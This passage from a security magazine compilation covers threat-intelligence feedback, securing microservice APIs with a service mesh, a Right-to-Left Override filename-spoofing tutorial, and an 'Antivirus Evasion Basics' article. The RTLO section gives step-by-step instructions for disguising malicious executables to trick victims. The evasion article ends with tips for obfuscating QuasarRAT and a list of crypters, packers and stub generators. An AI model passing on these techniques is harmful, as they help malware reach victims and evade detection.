Before I even begin talking about using feedback, I feel obligated to provide a tip about receiving feedback.
Please, make it easy for your stakeholder to present feedback. For instance, I built a simple Google form that I
can send pre-filled with context data to the stakeholder that can be filled in under a minute, if they so wish.
Subsequently, I produce a shareable link and personally message the stakeholder. I thank them for submitting
the request for information and ask them to fill out the form. I also mention it will take only moments of their
time. It is not my intent to boast, but under this construct I have a 100% return on my request for feedback.
Now once you have your feedback, use it! Even if you believe your stakeholder is misaligned in some way, that
still means the mark is being missed. Are your reports too long? Are they missing key details? Was your
intelligence not actionable? Was the delivery medium wrong? Did it take too long? These are just a few
examples of things that, while they can bruise the ego, can incrementally improve your intelligence reports and,
ultimately, your intelligence program.
There are two vital measurements I set as mandatory fields for feedback: relevance and impact. The great part
about this is it ties back to our other tenants of the EASY button. Your relevancy should be high if you are
answering the requirements set during the “Elicit Requirements” phase. These are the questions you need to
answer for your stakeholder and if you send something that isn’t relevant but you felt met the requirement, it is
time to readdress your requirements with your stakeholder. Impact is vital for “Strive for Impact.” Did the
information help the stakeholder DO or DECIDE something? If the intelligence did, you are on the right track. If
it didn’t, do a bit of analysis as to why. Maybe there was not enough context for the importance of the
information. Maybe the message was not clear. Use feedback as a gift to make the program better.
Conclusion
I hope this helps the producers and the consumers of intelligence. Used correctly, threat intelligence can
validate strategy bets for security, aid in the improvement of the security posture, and give impactful value to
stakeholders around the organization. I also hope this demystifies intelligence and highlights the need to be
proactive in security. In my philosophy, intelligence leads security. If you understand the threats your
organization faces and you have your organization’s context in mind, you can get ahead of the ever-changing
and never-ceasing threat.
20
Securing the API Economy
Securing the API Economy
Abhi Singh
Abhi is a Senior Manager at Deloitte's Cyber Risk practice. He
focuses on Cyber Security issues at large Financial Services
clients. He has over 17 years of information security
experience. His current focus areas include perimeterless
security architecture and leveraging blockchain for security use
cases.
The network by virtue implements least privilege without relying on developers for it.
This can be a manageability and scalability headache. One method to implement
these capabilities is to use “Service Mesh”. This mesh will determine how each
service discovers each other (discovery) and talk to each other (routing). This was
previously done using load balancers in front of each service. Following this logic,
most of these load balancers are manually managed and if you were to add a new
service, you would open a change ticket that would be serviced by IT. Load
balancers introduce a cost penalty and an agility penalty based on how fast an
organization turns around the tickets, thereby defeating the overall purpose of
rapidly scaling using microservices.
API led digital transformation and security
More and more financial services organizations (FSI) are making customer experience a part of key
performance indicators. This change leads to an increasing focus on delivering a more personalized service
rather than a cookie cutter approach led by the constant churn of new products.
Given the nature of their business, most FSI organizations have massive troves of data that can be tapped
using modern computing paradigms such as advanced data analytics, hyper cloud and artificial intelligence.
The insights learned can be used to provide a personalized seamless experience in a multi-channel
environment (e.g. mobile, web, connected devices, etc.).
21
Securing the API Economy
An application programming interface (API) based model is the most logical choice for this transformation. APIs
make it easier to integrate and connect people, places, systems, data, things, and algorithms, create new user
experiences, share data and information, authenticate people and things, enable transactions and algorithms,
leverage third-party algorithms, and create new products/services and business models.
However, with this rapidly scalable and interlinked environment, security often takes a back seat in comparison
to business agility. Our attempt in this paper is to describe a few security paradigms that can be included as a
part of the core API based architecture to allow for agility and scalability.
Understanding the core architecture
One of the foundational elements of the API based architecture is loose interlinkages between different
applications or parts within the application. This coupling provides extensibility, reliability, and scalability.
An application can be thought of as a Lego kit that is built from several individual pieces (microservices) [1]
serving a specific role and, when assembled in a definite manner (interfaces), form a defined structure.
Here is a typical architecture pattern for accessing a bank account:
Fig 1. Simplified microservices based financial application high level architecture
In this (simplified) example, the user can query his information, such as bank balance, using an app developed
by the bank, or via a finances aggregator app developed by a 3rd party, or via a normal web interface. In each
case, the customer-facing micro-service will render the correct UI based on the access and populates the data
with the help of an aggregator service.
22
Securing the API Economy
The aggregator service (is supposed to) understands the data elements needed to satisfy the user query and
needs to connect to a data repository or a storage microservice to fulfill.
Each of these microservices are independent of each other and interact using well defined interfaces[2]. This
loose coupling allows many benefits such as on-demand scaling of any microservice, for example, based on
the number of users accessing their account the UI microservice can scale up or down with demand without
impacting the others. Other advantages include predictable response due to well defined interface, lower
computing overhead, faster time-to-market due to rapid releases, localized testing requirements, lower
operational margins, effective resource utilization by focusing resources on microservices rather than the entire
application, amongst many others.
This architecture is usually implemented using containers such as Docker[4]. To achieve the basic tenets automated application deployment, scaling, and management - these containers are managed using container
orchestration systems like k8s[4] and docker swarm[5].
Given our focus on securing the above architecture, we will not go into details of these orchestration systems.
However, the footnotes provide an authoritative background on most commonly used systems.
Key security issues in this container driven agile environment
Disregarding (for simplicity) the issues that manifest in a multi-cloud scenario, the traditional security layered
defense doesn’t work in this case. Here are some reasons (not an exhaustive list):
• External facing APIs present a great misuse target[6] as they can expose application logic and potentially
sensitive data.
• Each microservice might have a small attack surface but the combined attack surface of the overall system is
hard to understand and defend.
• If each team can choose the language and frameworks for their microservice, it becomes extremely hard to
manage the security risks in a standardized manner.
• There is no choke point in the flow or network so logging, debugging, and access management becomes
tricky.
• There is an implicit trust on underlying hosts (or SaaS services in case of public cloud) to be secure and
provide segmentation based on risks posed by each container.
• In many cases these container hosts are dynamically created so enforcing the security measures to protect
the container runtime can be a challenge.
• Given the seamless flow of information between the containers, there is a strong possibility of lateral
movement if one of the containers is compromised. This issue can also lead to container/microservice
hopping following the predictable pattern of application flow[7].
23
Securing the API Economy
• Monitoring is a challenge as the environment changes dynamically making it harder to correlate the data.
• Often microservices are made up of upstream proprietary and open source components. This can introduce
downstream vulnerabilities[8].
• Managing encryption keys or shared secrets leveraged by a container is a challenge because of the lack of
secure methods in deploying identifying keys in microservices. The encryption keys or secrets might also be
hard coded into container images.
• Integrating identity and access management can be an issue as there are multiple authentication and
authorization mechanisms present in a company and not all of them may be compatible with the container.
• As the application becomes fragmented and communication is purely API based, the developers have less
visibility into overall flow or business logic. This can lead to accidental exposure of information.
The (castle-wall based) tools currently available might not be fully capable of handling the new challenges
mentioned above. There aren’t many firewalls that observe east-west flows within the data center and
managing access control lists in a dynamically changing environment is almost impossible.
Integrating security in the life cycle
The basic tenet of the challenges mentioned above is the breach of trust using something that we inherently
trust such as a workload running on a container[9]. This is the same as what we have in a traditional data
center-based infrastructure, like a breach using a server running on an internal network.
To create a fundamentally secure infrastructure, we probably should not place any inherent trust on the network
leading to each system/container/pod becoming an island.
Fig 2. Breach is essentially localized
24
Securing the API Economy
However, to achieve this architecture, the following key capabilities are required:
Every flow on this network is known - Applications have capability to engage in TLS based sessions.
Every flow is authenticated and authorized - Access control list, encryption keys, and credentials need to be
managed between microservices all while services are being added or changed.
The network by virtue implements least privilege without relying on developers for it. This can be a
manageability and scalability headache.
One method to implement these capabilities is to use “Service Mesh”[10]. This mesh will determine how each
service discovers each other (discovery) and talk to each other (routing). This was previously done using load
balancers in front of each service. Following this logic, most of these load balancers are manually managed and
if you were to add a new service, you would open a change ticket that would be serviced by IT. Load balancers
introduce a cost penalty and an agility penalty based on how fast an organization turns around the tickets,
thereby defeating the overall purpose of rapidly scaling using microservices.
So, with “Service Mesh”:
All service-to-service communications happen via Service Mesh (implemented as a software component,
proxy, placed adjacent to each microservice).
There is a central registry that is dynamically managed as the service instances come online and offline. So
new workloads can query this central registry to find the IP addresses of the services that they want to
connect to.
There is native support for some network functions such as resiliency, service discovery, etc.
Application developers can focus on the business logic while network and security functions can be
offloaded to the service mesh.
Circuit breaking can be achieved as a native feature.
The capabilities are language agnostic.
Security controls (encryption, authentication, authorization) can be implemented, managed, and scaled
dynamically without actually modifying the application.
In order to enforce these security requirements and decisions, the proxy needs access to workload (container)
identity. These identities need to be created, rotated, and managed as the workloads change.
The second tenet is repository authorizations maintained for each service. At a high level, the architecture
would look similar to:
25
Securing the API Economy
Fig 3. High level design for enforcing security using a service mesh architecture
A policy server can be used to define identities using digital certificates and has the keys to sign and validate
these identities. The agents manage the certificate lifecycle and distribution of the correct certificates to the
right proxies.
Fig 4. Service-Mesh based flow
Advantages of the service mesh based design
Authentication becomes seamless, automated, and scalable
• In this decoupled design, the application can continue to function if there is an outage in the control plane
• Agents are only needed when the proxy boots or when the identity expires
26
Securing the API Economy
• Because agents manage the identities (keys) automatically, the lifetime can be pretty short (e.g. 12 hours)
• There is no need to maintain keys in the enforcement plane, thereby reducing the attack surface
• Policy agents issue the identities to the service proxies, which in turn can use these identities to perform
communication over TLS using mutual authentication. The application does not need any changes in this
case
Authorization can be enforced to minimize the attack surface
• The engine contains fine grained application level policies that can describe the type of requests (e.g. GET,
service accounts that are allowed access) accepted at the service (workload) level. So even though the proxy
has the required identity, the request can still be deemed unauthorized if it’s not explicitly allowed in policy
server and enforced using enforcement agents. Depending on the capability of the proxy to understand the
details of protocols, you can enforce different match criteria
• The enforcement agent is only needed when the policy changes, otherwise, it is decoupled from the proxy
• When the proxy gets the access request it performs the following steps:
Authenticates the request
Captures the details of the access requested
Matches the request against the authorization policy as dictated by the enforcement agent
Allows or denies the request
Other benefits
• Proxy can be used to collect and forward logs to a central (SIEM type) service. It can also integrate with other
messaging systems[11].
• As proxy intercepts all the traffic close to workload, it is possible to identify accidental or intended data leaks.
• Compliance requirements of each type of workload can be defined in the policy server based on the data
type, location, etc. Agents can calculate the proxy specific compliance requirements. The proxies can be
used to enforce it on a request by request basis.
Beyond infrastructure - Further reducing the attack surface
The above approach will reduce the attack surface exposed due to infrastructure elements. However, the APIs
themselves may provide a viable breach target (though the impact might be localized and limited).
Below are some strategies to mitigate the attack surface exposed by APIs[12].
27
Securing the API Economy
1. Making security an integral part of the continuous delivery pipeline: At a high level, the flow along with
security components looks like below. Note this is just a representation check the footnotes for more
definitive sources in this area[13].
Fig 5. Security in CI/CD pipeline
2. Focusing on compliance as a product: DevOps Audit Defense Toolkit[14] summarizes the techniques that
can be used to demonstrate to auditors that the company understands the business risks and are properly
mitigating those risks. The compliance requirements are automated in the CI/CD pipeline tools. The change
management is also automated and every change in the code is tied back to an approved ticket. This
enforces traceability and auditability.
3. Security of infrastructure code: The practices mentioned in DevOps Audit Defense Toolkit are applicable in
this area as well. Configuration management and automation tools like Ansible, Chef, Puppet can be used to
support the automated testing. Peer reviews are conducted before commits. All changes are logged and
analyzed.
Leveraging provable security methods
Provable security[15] (or model based validation) in our context means using formal methods to test and
demonstrate the security of the design. We start with threat modeling (albeit not considering side channel
attacks) and determine the coverage provided by the controls as the attack manifests.
The above mentioned design is based on the two high level set of policies:
Identification / authentication / access control lists, and;
28
Securing the API Economy
Authorization
The objective here would be to develop an automated system that would validate the security of the design by
comparing it against the defined benchmarks (or set of fundamental rules that we have defined for the
particular environment). For example, a benchmark can be that the production systems should only be
accessible via a jump host or the user ids that have access to the systems’ changes based on the time of the
day (such as on-call roaster).
As in traditional design, we can leverage a threat modeling[16] to determine the potential vulnerabilities (and
hopefully the associated attack trees). Once we understand these vulnerabilities, we can determine the
corresponding rules that can be enforced using the policies described on Policy Server.
These policies describe the expected state (benchmark policies) of the environment that should be enforced by
agents through proxies.
During the day to day operations, the system admins, application owners, and others will define new policies.
Before the new policies can be implemented, they can be compared automatically (part of CI/CD pipeline) with
the pre-defined benchmarks. So the flow might look like:
Fig 6. Embedding provable security in CI/CD flow
The advantage of this process is that it is completely transparent to the developers or infrastructure engineers.
When a change to the existing environment is pushed (for example, a new app version that requires
modifications to the existing access or authorization policies), the change is automatically routed to the analysis
engine. The engine then compares it against the benchmarks and highlights the policy areas that violate the
required security thresholds.
29
Securing the API Economy
As the analysis is done at the policy element level, the output/remediation also contains the exact elements that
need to be modified to meet the required criteria.
In addition, the CI/CD pipeline can be configured to check the policy changes against the baseline before filing
a change ticket.
References:
[1] https://doi.ieeecomputersociety.org/10.1109/MS.2018.2141039
[2] https://en.wikipedia.org/wiki/Application_programming_interface
[3] https://en.wikipedia.org/wiki/Docker_(software)
[4] https://github.com/kubernetes/kubernetes
[5] https://docs.docker.com/engine/swarm/
[6] https://www.owasp.org/index.php/OWASP_API_Security_Project
[7] https://dl.acm.org/citation.cfm?id=3274720
[8] https://github.com/devsecops/devsecops
[9] https://ai.google/research/pubs/pub43231
[10] https://www.nginx.com/blog/what-is-a-service-mesh/
[11] https://kafka.apache.org/
[12] https://www.owasp.org/index.php/OWASP_API_Security_Project
[13] https://www.devsecops.org/, https://www.devsecopsdays.com/
[14] https://itrevolution.com/devops-audit-defense-toolkit/
[15] https://en.wikipedia.org/wiki/Provable_security
[16] https://insights.sei.cmu.edu/sei_blog/2018/12/threat-modeling-12-available-methods.html
30
Right to Left Override (RTLO) Technique
Right to Left Override (RTLO) Technique
Pal Patel
Pal Patel is a Security Researcher, Penetration Tester, and Bug Bounty
Hunter with over 3 years of experience. Pal has been awarded by more than
250+ companies for finding the loopholes in their systems.
The word RTLO stands for RIGHT TO LEFT OVERRIDE is a Unicode mainly used for
the writing and the reading of Arabic or Hebrew text. Unicode has a special
character, U+202e that tells computers to display the text that follows it in right-toleft order, A Unicode character that will reverse the order of the characters that
follow it. RTLO has been used for phishing attacks for many years, where attackers
insert the RTLO character in the filenames of attachments and try to trick users into
thinking the attachment is safe.
What is RTLO?
The word RTLO stands for RIGHT TO LEFT OVERRIDE is a Unicode mainly used for the writing and the reading
of Arabic or Hebrew text. Unicode has a special character, U+202e that tells computers to display the text that
follows it in right-to-left order, A Unicode character that will reverse the order of the characters that follow it.
RTLO has been used for phishing attacks for many years, where attackers insert the RTLO character in the
filenames of attachments and try to trick users into thinking the attachment is safe.
For example, a file named “malwaregpj.exe” will appear as “malwareexe.jpg”, which is an executable file with a
U+202e placed just before “exe.”
31
Right to Left Override (RTLO) Technique
The RTLO character can be found from Character Map:
How do you Trick a victim using the RTLO technique?
This trick can be normally used in the chat functionality when you are chatting with a victim.
For example:
“Hey check out my new song at example.com/song[rtlo]3pm.exe.”
32
Right to Left Override (RTLO) Technique
Replace the RTLO word from URL and put RTLO symbol from the character map and send the URL to the
victim. When the victim receives the URL its looks like:
“Hey check out my new song at example.com/songexe.mp3.”
When the Victim sees mp3, at least he/she thinks it’s a song so he/she clicks on the link. As soon as they click
on the link, RTLO gets trigged and it shows you:
http://example.com/song%E2%80%AE%E2%80%AE%E2%80%AE%E2%80%AE%E2%80%AE
%E2%80%AE3pm.exe
33
Right to Left Override (RTLO) Technique
It can trick the victim in the same way and also different social engineering techniques are used to trick the
victim using RTLO. Twitter, Skype, Snapchat, etc., have protection against the RTLO technique in chat
functionality.
This technique is a bit old, but it’s still being used for placing malware, backdoors, etc.
Let’s take another example:
• There is a malicious file named doc.exe
• Copy the RTLO character from the Character Map
• Enter the extension that you want in reverse, for example, if we want "doc", we need to write "cod", or if we
want "pdf", then we need to write "fdp"
• The real name of the file is: "doc[RTLO]fdp.exe"
• Paste the RTLO symbol
• After the file would be docexe.pdf. A victim can be tricked using the file extension
• A good idea would be to change the icon of the malicious file and also use a name that can trick the user, like
a malicious file disguised as a Microsoft Word file, with a tricky name in order to preserve the original
extension and fool the user
Conclusion
Hackers use every trick in the book to disguise their malicious files. Read more about phishing techniques and
ways to protect yourself. These tricks are very easy to implement and effective. We should be vigilant for every
URL or file that we download or open. As they say, the devil lies in the details.
BE SAFE, BE SECURE!!
References:
https://www.ipa.go.jp/security/english/virus/press/201110/E_PR201110.html
https://krebsonsecurity.com/2011/09/right-to-left-override-aids-email-attacks/
34
Antivirus Evasion Basics
Antivirus Evasion Basics
Bohdan Ethics
Ethical hacker with 12 years of experience. Worked in
CQR company in Ukraine. Geek, IT security addict. His
nickname is VULNZ.
Many antiviruses are designed to function analogous to the immune system of a
human being. They operate by scanning the computers for available signatures
corresponding to the binary pathogens and infections. The antivirus refers to a
dictionary of the known viruses, and if any detail obtained within the file resembles
the pattern in the dictionary, then the antivirus neutralizes it. Analogous to the
human immune system, the content of the dictionary requires updates like the flu
shots to provide considerate protection against emerging strains of viruses. Any
antivirus counteracts to what it deems as harmful. The problem arises concerning
the creation of new strains of viruses at a rapid rate at which the antivirus
developers may not keep pace.
Basic information
In this article, we are going to talk about how to evade antivirus protection and how it can be hard for
developers who create legitimate software and techniques on antivirus evasion. I strongly recommend that you
use this information for white-hat purposes only, otherwise, you can get in trouble. We will talk about all types
of things that can help a developer avoid false positives in development of their software. Everybody who is
facing this problem should know all the basic things and tools that can help handle this type of problem.
35
Antivirus Evasion Basics
False positive EXE.cuted. False positive problems on legitimate software
This research is made for developers who face false positive results on their software.
Signature detection
Many antiviruses are designed to function analogous to the immune system of a human being. They operate by
scanning the computers for available signatures corresponding to the binary pathogens and infections. The
antivirus refers to a dictionary of the known viruses, and if any detail obtained within the file resembles the
pattern in the dictionary, then the antivirus neutralizes it. Analogous to the human immune system, the content
of the dictionary requires updates like the flu shots to provide considerate protection against emerging strains
of viruses. Any antivirus counteracts to what it deems as harmful. The problem arises concerning the creation
of new strains of viruses at a rapid rate at which the antivirus developers may not keep pace. Thus, the
computer becomes vulnerable during the period between the time of detection of the virus and the time the
dictionary update is released from antivirus dealers, the reason behind keeping the antivirus updated as much
as possible.
Scan engines Method
Most importantly, the antivirus’s core function is virus scan engine. The antivirus scans the information, and
when the virus is detected, the antivirus disinfects it. Mentioned below are different ways of virus scanning.
36
Antivirus Evasion Basics
Main Basic Techniques
Size: the antivirus easily detects if the file is changed or infected. It is common for some viruses to append their
malicious codes at the terminal of the file. An antivirus, in this case, scans the file and then compares the before
and after sizes. When the computer user makes no changes, the antivirus suspects the presence of malicious
actions running on the computer.
Pattern matching: there is a distinct and unique signature corresponding to each virus. The signature is used by
the virus to infect files of computers and could be a few lines in an assembly language that overwrites the stack
pointer rather than jumping to the new line of code. The antivirus compares information with the virus’ unique
signature and presence of resemblance is a clear indication of an infection.
A heuristic process occurs when the information being scanned is dangerous without the user knowing whether
it contains a virus or not. The technique involves an analysis of the data and then comparing it the list of
hazardous actions. For instance, if the antivirus detects that software is attempting to open each EXE file and
infecting it by writing a replica of the original program into it, the antivirus recognizes the program and declares
it is a dangerous activity and thus sounds an alarm. Now the decision remains to the user whether to eliminate
the perilous virus or not.
The above methods have merits and demerits. If the antivirus utilizes the signature approach, it needs to
update it regularly. This should be done on a daily basis since at least 15 new viruses emerge every single day.
Thus, if the antivirus is left un-updated for many days, it may cause severe danger.
Other ways the antivirus works includes monitoring of incoming files and deleting any virus within the files,
placing suspect files in quarantine and updating the software produced by the developers to address emerging
infections. In this case, the software may be set such that it checks for updates at regular time intervals.
False positives
False positive is the process of false and positive identification of a computer virus. In false identification, the
antivirus identifies a good program as a virus. False positive is regarded as a demerit of virus identification
method. Small weaknesses of any virus identification method may result in false positives that are fatal as false
negatives.
For an ideal situation, the false positive rate tends to be zero or approximately close to zero. Any small rise in
the false positive rate is not desired.
37
Antivirus Evasion Basics
Note: This is a good example of what percent of false positives occur. These are outdated statistics, but the
idea is clearly seen.
• Reasons for getting False Positives
There are particular procedures that give very sensitive scanning by determining the relationship between the
viruses and their signatures. This type of method has a drawback whereby it is impossible to detect new and
unknown viruses. However, generic methods can identify all kinds of viruses without necessarily using virus
signatures. The generic methods also have their drawbacks since they create false positives.
For instance, the heuristic can detect new and unknown viruses though they are prone to false positives. This is
because the method adopted by heuristics relies on probabilistic methods and is therefore not certain of an
infection.
For example, if a heuristic program identifies a file “open” prompt, followed by “file read” and “write” prompts,
and also identifies a string “Virus” within the program, then it can respond that the file is under attack from the
unidentified virus.
There are chances that a file infected by a virus may meet all the conditions that render it infected; this is what
results in false positives.
As mentioned, generic methods are the most susceptible to false positives.
38
Antivirus Evasion Basics
False positives may result due to the complications that arise in determining the disparity between codes that
are good and bad. Making wrong decisions may result in a false positive or a false negative. The antivirus
functions to solely find signatures of viruses and not the whole of the virus program. It also looks for wildcard
signatures. The signatures that the antivirus finds may not necessarily be of virus codes only.
Since the conventional signature is redundant when handling polymorphic and metamorphic malware,
antiviruses with new technologies should incorporate heuristic approaches in dealing with such viruses. Such
methods are often faced with high rates of false positives.
• Solutions
1. All software should have the same basic information as a binary file: Description, Version, Product name,
Language, Company name. Many false positives are because the file does not have any information inside, so
it’s flagged as suspicious or unwanted.
2. We need to check if the file was flagged as a virus based on its md5; it is a very uncommon situation, but it
can accidently happen. Here is an example of how it can happen.
3. We need to pack exe in order to make it harder to unpack it.
In this case, we need to use a custom packet, but on the other hand, it is better to pack it using standard UPX
because creating a custom pack can cause new problems for antiviruses that will not be able to identify which
type of packer was used.
39
Antivirus Evasion Basics
Antivirus programs trust commonly used packers and do not like custom packers or some kinds of antivirus
packers.
4. We have to avoid using hooks that write themselves or read from registry if we don’t need it. Here is a list of
suspicious registry calls that should be avoided:
call for: antivirus software, firewall, remote administration, keyboard layout, extension change, update enable/
disable, look/edit system journal.
5. We have to avoid using system files and services that work with remote administration or connections if we
do not develop network software.
Calling integrated software, like ftp, telnet, psexec, rdp or other, inside our binary can cause a false positive
because a lot of malicious software use an integrated ftp client as an example to steal and transfer data over
the internet. It is better to use system tools, not system software.
40
Antivirus Evasion Basics
6. It is a good idea to create an MSI packer for installing and uninstalling software.
Here is an example of how to create MSI packages. It was also checked that antivirus programs trust more MSI
files because they are mostly used with good purpose and bypass behavioral analysis better.
example of terminal utility to pack exe to upx.
7. We can give the ability to check if compiled binary is flagged as malware using VirusTotal database right
away and give advice.
8. Can be useful to avoid reverse if someone who develops want to avoid reversing of his code - enable anti
VirtualBox/sandbox solutions with virtualenv detection.
9. Avoid community from creating malicious software. Talk to the community and make weekly research on
github and other websites in order to see if someone created malicious software. This will make antivirus
companies look deeper and maybe give more false positives. This happened with the Develstudio project.
Develstudio is a project created to create GUI or binary from php code. Based on research, this project almost
closed and lost a large number of followers because it was used for malware creating, not php2exe clean
projects creation. The algorithm can be as simple as this: find all similar projects on github, download them to
cloud and check all releases (binary) for viruses. To make it more complex - compile and check. This is not hard
41
Antivirus Evasion Basics
if the community is not big. Here can be found wrappers for common viruses, so it will make it easier to work
with them, not only checking it on VirusTotal.
10. Better not to use common names of Windows core files as it was found that some antiviruses found
common names like “svhost.exe”, “system32.exe”, etc.
11. Better not to use names of commonly used software like “firefox.exe”, “chrome.exe”, etc. It was proven that
3-5% of antiviruses react on this type of names rechecking md5 of real products and their versions and this
binary.
12. One of the most important procedures on software development is approvement and it was checked that all
binary software that is not signed in or flagged on antivirus server as commonly used will be blocked by the
browser or Windows smart screen.
Here is an automated solution with a bat file that can be performed in order to sign up software. Here is a
commercial utility and project where you can buy a cert and software to sign up builds.
13. Do not put multiple exe files inside one. This type of activity is common for a Trojan horse virus, so it is
important to understand that archiving one binary inside other for some reasons can cause problems.
Note: This is example of exe joiner that was marked as malicious even without being so only because it is
commonly used to glue down some malicious software, so its algorithm is marked as malicious, too.
14. It was found that some binaries have a large number of ZEROs following each other. For antiviruses it could
be understood as problematic software because it creates specially unused area in memory or on a hard drive
in order to: bypass md5 check, bypass some behavioral analysis, bypass signature based analysis, so it is
important to make code where no lines of zeros can be found on hex editor.
15. It will be a great idea to allow users to read terms and conditions before they install software or run it. There
is no information confirmed about antiviruses that check for existence of terms and conditions.
42
Antivirus Evasion Basics
16. Custom icons for binary files is one of reasons it may not be detected as malicious. As was explained
earlier, there are machine learning techniques that give information about “WHAT malware should look like” and
most of malware by itself does not have any icon, because their developer steals icons, which is detected by
antivirus as well, or don’t create one, leaving it standard.
17. Do not use special characters or big amount of white spaces or dots on name. It was checked many times
with different antiviruses that for purpose of defense from extension spoofing, names that violate certain rules
will be blocked and marked as malicious. It is easy to check creating clean exe with spoof name.
Here is software.
18. Files that download other files or source from internet and run it. This looks like a problem for some
antiviruses as long as they cannot control all processes, so if they may a mark, this action appears suspicious.
19. Files that download and run libraries can be flagged as dangerous because based on machine learning
some .dll files can be used in massive development of malicious software and you can be the one accidentally
using it. It is always better to use OS integrated software.
20. Try not to inject into a running process because, as was mentioned before, many antivirus solutions can see
hooks or injectors and mark them suspicious even if they do not do any harm.
Signature creation process:
Here is a good article where everything can be found about creating signatures for viruses for ClamAv. This
article was read and based on it we put some additional information above.
Solving problem:
It can be developed software that will detect if binary was compiled by compiler and help it to bypass all
problems step by step, or it can be integrated inside compiler (not sure it is a good idea based on size that will
be increased). All steps could be found above.
The idea is to make it easier for developers who want to distribute their software but constantly face problems
with false positives. This can be a different product but it can be put like “tools” that help developer with this
issue.
43
Antivirus Evasion Basics
Note: Example of what an exe maker/wrapper can look like that can help to bypass false positives.
To summarize all information given before, here is what antivirus engineers answer on why false positive occur.
Some comments on why false positives run on their antivirus solutions:
Ryan Permeh, Cylance:
"The Cylance engine is not an antivirus engine. Unlike AV, it doesn’t have a bias toward letting everything run.
The technology doesn't assume a file is good until it’s evaluated. Our approach is to measure and decide on
each and every file individually, and if it doesn't fit into our model of good, it leans towards bad. Without a bunch
of data to base a decision on, and without any real patterns of goodness to identify it as such, the engine leaned
heavily on the structural bits that are odd and drew a line towards bad in this case. When we train models, we
train on hundreds of millions of good and hundreds of millions of bad files (samples). We look at several million
potential data points (features) in each file in general, a piece of code can become "bad" by doing things that
lean towards bad. But it can also lean towards bad by not doing things that lean towards good. So in the most
basic example provided (hello world in debug build). The sample was small. It didn't show any bad, but it didn't
show any good either; One function programs are almost always malware; Debug builds are statistically weird;
Using mingw rather than visual studio is statistically weird. The output binary is 'odd.'"
Hyrum Anderson, Endgame:
"Before Twitter caught ablaze with these “hello world” samples, our own internal research indicated that our and
other models were susceptible to these toy samples. Let’s explain why. Endgame’s machine learning malware
detection uses static features to determine before a customer executes a file whether it is likely malicious or
benign. The machine learning model is an imperfect summarization of tens of millions of malicious and benign
software on which the model was trained. As an imperfect model, it can obviously be wrong, but still extremely
44
Antivirus Evasion Basics
useful in detecting never before seen malware, far more useful than approaches which rely on signatures for
already known malware families. For the case of our model and other machine learning models based on static
features, the model can be wrong in this case because, in the training dataset, the model has seen: lots of real
malware samples that are small unsigned binaries; lots of real malware samples where the entry point (.text)
section is small, like droppers unpacking stubs; lots of real malware samples that attempt to hide their imports
from static analysis by some method, so that their import table looks very small. On the contrary, there are very
few “useful” benign files that are small, certainly too few to contradict the above experience. It’s important to
note that machine learning is actually quite good for prevention and detection malware, both novel samples and
the more well known. Endgame was one of the only few to get NotPetya in VirusTotal, for example. That said, all
machine learning models have blind spots (false negatives) and they can mistakenly call things bad (false
positives). In fact, we’ve shown in our published research that for some machine learning models, these
vulnerabilities can be quite convenient to exploit... At Endgame, we employ a strategy of layered protections
that align with a large number of commonly seen attacker actions. Our MalwareScore engine (released
standalone in VirusTotal) represents only a single slice of that layered protection paradigm. The layers work in
concert to alert our customers of potential threats (reducing FNs), and working together to build a complete
story of a potential threat (reducing FPs). Fortunately, the samples highlighted on Twitter are interesting corner
cases, but are extremely esoteric for our customer base. Nevertheless, we continually are doing more research
to improve our detection ratio and reduce our false positive rate. This involves data gathering to increase our
model’s understanding of the universe of benign and malicious software as well as a huge amount of
experimentation effort to maximize our model’s performance. We put a great amount of attention on addressing
known false positives seen by our customers. As a result of these efforts, we regularly release models to our
customers and to VirusTotal. And, we continue to work with 3rd parties to validate our model’s performance on
real files.”
Dr. Sven Krasser, CrowdStrike:
"There are two important aspects to understand. First, the machine learning models for static file analysis we
use at CrowdStrike are optimized to detect malware, especially novel families that bypass signature-based
approaches, while avoiding interference with legitimate business applications. However, unusual and artificially
constructed files fitting into neither of these two categories are occasionally detected as well. For this reason,
we expose confidence values and allow customers to set their own thresholds. While in this instance our file
analysis engine was arguably too aggressive, generally this behavior is by design: if a file does not look like a
legitimately useful application while also exposing unusual traits, then the sound call is to prevent it from
executing. Avoiding odd looking yet potentially benign objects should be a familiar concept should you have
ever opened an office fridge before. Second, static file analysis alone (i.e. what most vendors provide on
VirusTotal) is simply not a sufficient security tool on its own. It is easy to create files that behave benignly yet are
detected by both signature and ML-based engines. It is, however, also possible to create malware files that
bypass detection. That is trivially possible for signature-based engines, but one can also bypass ML-based
static file analysis with some effort. Therefore, CrowdStrike Falcon uses static file analysis as only one of many
45
Antivirus Evasion Basics
techniques to detect threats while combining it with several other layers of defense, such as advanced
Indicators of Attack."
Compilation from source
For the example of Quasar, you can take Visual Studio 2017 and build from source.
Previously, you can add to the code itself:
1) Commands or variables that do not affect the process
2) Additional functions that do something
3) Delay the execution of something
4) Change the names of variables in the entire project
5) Obfuscate the code
6) Remove fingerprints (name of shpz, author name)
https://github.com/quasar / QuasarRAT
> 1.exe head 1000 1.exe> / host / machine / with such a load, you can see on which bit of code
the antivirus swears.
Hex editor
46
Antivirus Evasion Basics
https://mh-nexus.de/en/hxd/
https://www.x-ways.net/winhex/
https://www.wxhexeditor.org/
Debuggers
https://www.immunityinc.com / products / canvas / debugger
https://samsclass.info/127/proj/p8aim.htm article
https://exelab.ru/download.php?action=list&n=MTA=
Signature certificate
http://qaru.site/ questions / 54786 / signing-a-windows-exe-file guide - Windows in the standard way
https://www.connect-trojan.net/2016/06/aegis-crypter-8.5.html Aegis cryptor has this function
47
Antivirus Evasion Basics
Installers and spx:
https://www.advancedinstaller.com/
https: //www.actualinstaller. com /
http://www.cyberforum.ru/cmd-bat/thread2022256.html sfx archive
Packers
48
Antivirus Evasion Basics
UPX, ASPack, FSG, PeShield, VMProtect
https://github.com/EgeBalci/Amber
https://github.com/ Eronana / packer
http://www.webtoolmaster.com/packer.htm
https://www.boxedapp.com/
https://github.com/SerGreen/Appacker Very interesting packer, it can pack the entire folder
Protectors and anti-debuggingdebugging
Antihttps : //github.com/bekdepo/cryptor you need to compile
https://github.com/Paskowsky/DreamProtectorFree GUI
https://exelab.ru/download.php?action=list&n=NDA= collection of protectors are still relevant
Cryptors
https://github.com/Ch0pin/AVIator/tree/master/Compiled%20B inaries https://github.com/Ch0pin/AVIator
https://github.com/NYAN-x-CAT/Lime-Crypter
49
Antivirus Evasion Basics
https://github.com/extremecoders-re/xor-files xor
https: // github .com / malwares / Crypter to compile a huge list
https://github.com/guilhermej/scantime_py_crypter easy to understand, you can change the key
Stub generators
https://www.youtube.com/watch?v=_Qx3UZAuo8o
